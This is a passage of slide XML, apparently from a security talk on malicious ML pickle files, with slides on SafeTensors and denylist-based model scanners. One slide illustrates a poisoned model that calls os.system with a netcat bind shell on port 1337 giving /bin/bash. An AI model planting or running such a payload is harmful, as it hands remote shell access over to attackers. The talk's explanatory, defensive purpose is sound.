              <a:schemeClr val="dk2"/>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b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>IMPORT torch.FloatStorage</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>CREATE torch.FloatStorage.__new__</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>IMPORT torch.rebuild_tensor_v2</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>INVOKE torch.rebuild_tensor_v2(...)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>IMPORT os.system</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>INVOKE os.system(‘nc -lp 1337 -e /bin/bash’)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Google Shape;474;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504773" y="1246716"/>
            <a:ext cx="714000" cy="687000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="21625">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="103825" lIns="103825" spcFirstLastPara="1" rIns="103825" wrap="square" tIns="103825">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1589"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="475" name="Google Shape;475;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504773" y="1246702"/>
            <a:ext cx="714203" cy="686634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="476" name="Google Shape;476;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810771" y="1748466"/>
            <a:ext cx="510653" cy="476563"/>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0" name="Shape 480"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Existing ML Pickle Security Solutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;482;p42"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="483" name="Google Shape;483;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="993900"/>
            <a:ext cx="7762875" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Google Shape;484;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1555000"/>
            <a:ext cx="39987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a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://docs.python.org/3/library/pickle.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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8" name="Shape 488"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Google Shape;489;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Existing ML Pickle Security Solutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p43"/>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491" name="Google Shape;491;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494774" y="1049110"/>
            <a:ext cx="7162800" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Alternate formats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>with less expressive representations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>are recommended. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>SafeTensors was designed for security.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="492" name="Google Shape;492;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="462775" y="1124431"/>
            <a:ext cx="474300" cy="336319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="493" name="Google Shape;493;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="937076" y="1124425"/>
            <a:ext cx="336325" cy="336325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="494" name="Google Shape;494;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="736350" y="1460750"/>
            <a:ext cx="437336" cy="39360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8" name="Shape 498"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Google Shape;499;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Existing ML Pickle Security Solutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Google Shape;500;p44"/>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501" name="Google Shape;501;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480375" y="2237831"/>
            <a:ext cx="7177200" cy="602100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model scanners </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>analyze models to identify unsafe callables applying a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>denylist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Hugging Face deploys multiple model scanners, but policies are incomplete.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Google Shape;502;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494774" y="1049110"/>
            <a:ext cx="7162800" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Alternate formats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>with less expressive representations are recommended. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>SafeTensors was designed for security.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="503" name="Google Shape;503;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491577" y="2203701"/>
            <a:ext cx="519894" cy="499831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Google Shape;504;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491577" y="2203722"/>
            <a:ext cx="519900" cy="499800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="15750">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="75550" lIns="75550" spcFirstLastPara="1" rIns="75550" wrap="square" tIns="75550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1156"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="505" name="Google Shape;505;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491577" y="2203711"/>
            <a:ext cx="519894" cy="499831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="506" name="Google Shape;506;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="593545" y="2242993"/>
            <a:ext cx="722933" cy="722933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="507" name="Google Shape;507;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="462775" y="1124431"/>
            <a:ext cx="474300" cy="336319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="508" name="Google Shape;508;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="937076" y="1124425"/>
            <a:ext cx="336325" cy="336325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="509" name="Google Shape;509;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="736350" y="1460750"/>
            <a:ext cx="437336" cy="39360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3" name="Shape 513"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Google Shape;514;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
